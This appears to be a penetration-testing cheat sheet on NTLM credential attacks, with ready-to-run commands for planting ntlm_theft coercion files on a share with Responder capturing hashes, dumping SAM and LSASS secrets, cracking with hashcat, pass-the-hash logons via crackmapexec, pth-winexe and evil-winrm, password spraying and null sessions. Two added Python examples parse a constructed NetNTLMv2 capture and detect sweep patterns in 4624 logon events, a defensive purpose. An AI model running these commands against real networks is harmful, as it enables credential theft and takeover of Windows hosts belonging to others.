NTLM Hashes

Capture NetNTLMv2 by writing to a Samba share

NTLM Theft

python ntlm_theft.py -g all -s 10.10.14.6 -f filename
-s is the IP of the attacker machine (where Responder listens)

Upload all of the files to the share

smbclient //flight.htb/shared -U USER 'PASS'
smb: \> prompt false
smb: \> mput *

Have responder listening for connections

responder -I eth0 -rdwv
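What Responder actually writes to its log for a capture like the one above is a line in the form USER::DOMAIN:SERVERCHALLENGE:NTPROOFSTR:BLOB. The following parser is an added example (not part of the original notes or of Responder) that splits such a line and decodes the blob header, which is the NTLMv2_CLIENT_CHALLENGE structure from MS-NLMP: a FILETIME timestamp, the 8-byte client challenge and the AV_PAIR target info. The sample line, the user fcastle, the MARVEL domain, the DC01 name and the NTProofStr value are all constructed here; the NTProofStr is a placeholder, not a real HMAC.

```python
"""Parse a NetNTLMv2 capture line and decode its blob header (added example, constructed data)."""
import struct
from datetime import datetime, timedelta, timezone

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)   # FILETIME epoch
UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)

# AvId values of the string-valued AV_PAIRs (MS-NLMP 2.2.2.1); others are kept as hex
AV_NAMES = {1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName", 3: "MsvAvDnsComputerName",
            4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName"}


def filetime_from_datetime(dt):
    """Windows FILETIME: 100-nanosecond ticks since 1601-01-01 UTC."""
    delta = dt - EPOCH_1601
    micros = (delta.days * 86400 + delta.seconds) * 1_000_000 + delta.microseconds
    return micros * 10


def datetime_from_filetime(ft):
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def build_blob(timestamp, client_challenge, av_pairs):
    """Assemble the NTLMv2 client-challenge structure that appears hex-encoded as the blob."""
    body = b"\x01\x01" + b"\x00" * 2 + b"\x00" * 4          # RespType, HiRespType, Reserved1, Reserved2
    body += struct.pack("<Q", filetime_from_datetime(timestamp))
    body += client_challenge + b"\x00" * 4                   # ChallengeFromClient, Reserved3
    for av_id, value in av_pairs:                            # target info echoed from the server challenge
        raw = value.encode("utf-16-le")
        body += struct.pack("<HH", av_id, len(raw)) + raw
    return body + struct.pack("<HH", 0, 0) + b"\x00" * 4     # MsvAvEOL plus the trailing reserved bytes


def build_sample_line():
    """Constructed capture (assumed user/domain/host names; placeholder NTProofStr)."""
    blob = build_blob(datetime(2024, 1, 15, 12, 0, tzinfo=timezone.utc),
                      bytes(range(1, 9)), [(2, "MARVEL"), (1, "DC01")])
    return "fcastle::MARVEL:1122334455667788:00112233445566778899aabbccddeeff:" + blob.hex()


def parse_netntlmv2(line):
    """Split a capture line and decode the blob; raises ValueError on a malformed line."""
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        raise ValueError("expected USER::DOMAIN:SERVERCHALLENGE:NTPROOFSTR:BLOB")
    user, _, domain, server_challenge, ntproofstr, blob_hex = parts
    if len(server_challenge) != 16 or len(ntproofstr) != 32:
        raise ValueError("server challenge must be 8 bytes and NTProofStr 16 bytes of hex")
    blob = bytes.fromhex(blob_hex)
    if len(blob) < 28 or blob[:2] != b"\x01\x01":
        raise ValueError("blob is not an NTLMv2 client challenge")
    ft, = struct.unpack_from("<Q", blob, 8)                  # TimeStamp at offset 8
    client_challenge = blob[16:24]                           # ChallengeFromClient at offset 16
    av_pairs, pos = {}, 28                                   # AV_PAIR list starts at offset 28
    while pos + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        if av_id == 0:                                       # MsvAvEOL terminates the list
            break
        value = blob[pos:pos + av_len]
        pos += av_len
        av_pairs[AV_NAMES.get(av_id, f"AvId{av_id}")] = (
            value.decode("utf-16-le") if av_id in AV_NAMES else value.hex())
    return {"user": user, "domain": domain, "server_challenge": server_challenge,
            "ntproofstr": ntproofstr, "timestamp": datetime_from_filetime(ft),
            "client_challenge": client_challenge.hex(), "av_pairs": av_pairs}


if __name__ == "__main__":
    for key, value in parse_netntlmv2(build_sample_line()).items():
        print(f"{key}: {value}")
```

The decoded timestamp tells you when the client built the response, and the AV pairs show which server name and domain the client thought it was authenticating to (under a poisoning attack, whatever the rogue server put in its challenge). Because the NTProofStr is an HMAC over that specific server challenge and blob, a captured line is only usable for offline cracking, not for replay.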

Dumping SAM Hashes with secretsdump.py

https://github.com/SecureAuthCorp/impacket

secretsdump.py DOMAIN/USERNAME:PASSWORD@IP

With a hash instead of a password (LMHASH:NTHASH)

secretsdump.py administrator@192.168.1.2 -hashes adwad2241...:7df4fbesf...

Ignore Guest, DefaultAccount and WDAGUtilityAccount

Cracking NTLM Hashes with Hashcat

On Windows

hashcat64.exe -m 1000 hashfile.txt rockyou.txt -O

Pass the hash

You can only pass NTLM (NT) hashes, such as those from a SAM dump; the NetNTLMv2 responses captured with Responder cannot be passed and have to be cracked.

pth-winexe -U Administrator%LMHASH:NTLMHASH //IP cmd

crackmapexec smb IP -u "USERNAME" -H HASH --local-auth

CrackMapExec

Brute Force

crackmapexec smb 10.10.10.184 -u USER_LIST -p pass.txt

List shares

crackmapexec smb 10.10.10.184 -u USER -p PASSWORD --shares

List users

crackmapexec smb 10.10.10.184 -u USER -p PASSWORD --users

Sweep a subnet with one password (password spraying)

crackmapexec smb 192.168.138.0/24 -u fcastle -d MARVEL.local -p Password

Using a hash instead

crackmapexec smb 192.168.138.0/24 -u administrator -H aadwaudfbwaufg382:7faceafawf --local-auth

In order to dump SAM hashes

crackmapexec smb 192.168.138.0/24 -u administrator -H aadwaudfbwaufg382:7faceafawf --local-auth --sam

Run the lsassy module to dump secrets stored in LSASS memory

crackmapexec smb 192.168.138.0/24 -u administrator -H aadwaudfbwaufg382:7faceafawf --local-auth -M lsassy

Pass the hash (PtH)

crackmapexec smb 10.129.95.210 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6 -d htb.local -x "dir C:\Users\Administrator\Desktop"
evil-winrm -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6 -i 10.129.95.210
evil-winrm -i 10.10.10.161 -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

Null authentication

crackmapexec smb 10.10.10.184 --pass-pol -u '' -p ''

Test credentials across the local network (password spraying)

crackmapexec smb 192.168.57.0/24 -u USERNAME -d DOMAIN.local -p PASSWORD
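On the receiving end, the subnet sweeps with --local-auth, the pass-the-hash logons and the null session above all leave 4624 logon events on the target hosts. The following added example (not part of the original notes or of CrackMapExec) shows the triage logic a defender would run over centrally collected Security logs: NTLM network logons (LogonType 3) with a local account from a remote address, grouped by source IP and account to expose one source touching many hosts, plus ANONYMOUS LOGON network logons for the null-session case. The records are constructed inline with field names from the 4624 event schema; the MARVEL domain, the host names and the addresses are assumptions.

```python
"""Triage NTLM network logons for pass-the-hash / local-admin sweep patterns (added example, constructed data)."""
from collections import defaultdict

AD_DOMAIN = "MARVEL"   # assumed NetBIOS domain; any other TargetDomainName is treated as a local account
LOCAL_ADDRESSES = ("-", "127.0.0.1", "::1")


def _ev(computer, user, domain, ip, logon_type=3, package="NTLM"):
    """One constructed 4624 record holding only the fields the checks below use."""
    return {"Computer": computer, "EventID": 4624, "LogonType": logon_type,
            "AuthenticationPackageName": package, "TargetUserName": user,
            "TargetDomainName": domain, "IpAddress": ip}


# Constructed sample collected from several hosts. The first three records are what a
# "-u administrator -H <hash> --local-auth" sweep over the subnet leaves behind.
SAMPLE_EVENTS = [
    _ev("WS01", "administrator", "WS01", "192.168.138.50"),
    _ev("WS02", "administrator", "WS02", "192.168.138.50"),
    _ev("WS03", "administrator", "WS03", "192.168.138.50"),
    _ev("WS01", "fcastle", "MARVEL", "192.168.138.10", package="Kerberos"),   # benign domain logon
    _ev("FS01", "svc_backup", "FS01", "-", logon_type=2),                     # console logon, benign
    _ev("FS01", "administrator", "MARVEL", "192.168.138.10"),                 # NTLM but a domain account
    _ev("DC01", "ANONYMOUS LOGON", "NT AUTHORITY", "192.168.138.50"),         # null session
]


def is_remote_ntlm_logon(ev):
    """4624, network logon, NTLM package, from an address other than the host itself."""
    return (ev["EventID"] == 4624 and ev["LogonType"] == 3
            and ev["AuthenticationPackageName"].upper() == "NTLM"
            and ev["IpAddress"] not in LOCAL_ADDRESSES)


def is_local_account(ev):
    """Local SAM account: domain field is not the AD domain (anonymous logons are handled separately)."""
    return (ev["TargetDomainName"].upper() != AD_DOMAIN.upper()
            and ev["TargetUserName"].upper() != "ANONYMOUS LOGON")


def local_account_ntlm_logons(events):
    return [ev for ev in events if is_remote_ntlm_logon(ev) and is_local_account(ev)]


def anonymous_network_logons(events):
    """Null-session logons such as the one produced by -u '' -p ''."""
    return [ev for ev in events if is_remote_ntlm_logon(ev)
            and ev["TargetUserName"].upper() == "ANONYMOUS LOGON"]


def sweep_sources(events, min_hosts=2):
    """(source IP, account) pairs that reached at least min_hosts distinct hosts with a local account."""
    hosts = defaultdict(set)
    for ev in local_account_ntlm_logons(events):
        hosts[(ev["IpAddress"], ev["TargetUserName"].lower())].add(ev["Computer"])
    return {key: sorted(reached) for key, reached in hosts.items() if len(reached) >= min_hosts}


if __name__ == "__main__":
    for (ip, account), reached in sweep_sources(SAMPLE_EVENTS).items():
        print(f"{ip} used local account {account} on {len(reached)} hosts: {', '.join(reached)}")
    for ev in anonymous_network_logons(SAMPLE_EVENTS):
        print(f"null session on {ev['Computer']} from {ev['IpAddress']}")
```

A single NTLM network logon with a local account is common on workgroup machines and for backup or scanner accounts, so the per-host hits are for triage; the grouped view is the stronger signal, since one source address authenticating as the same local administrator on several hosts is exactly the footprint of the subnet sweeps above. Unique local administrator passwords per host (LAPS) turn that sweep into a list of failed 4625 events instead.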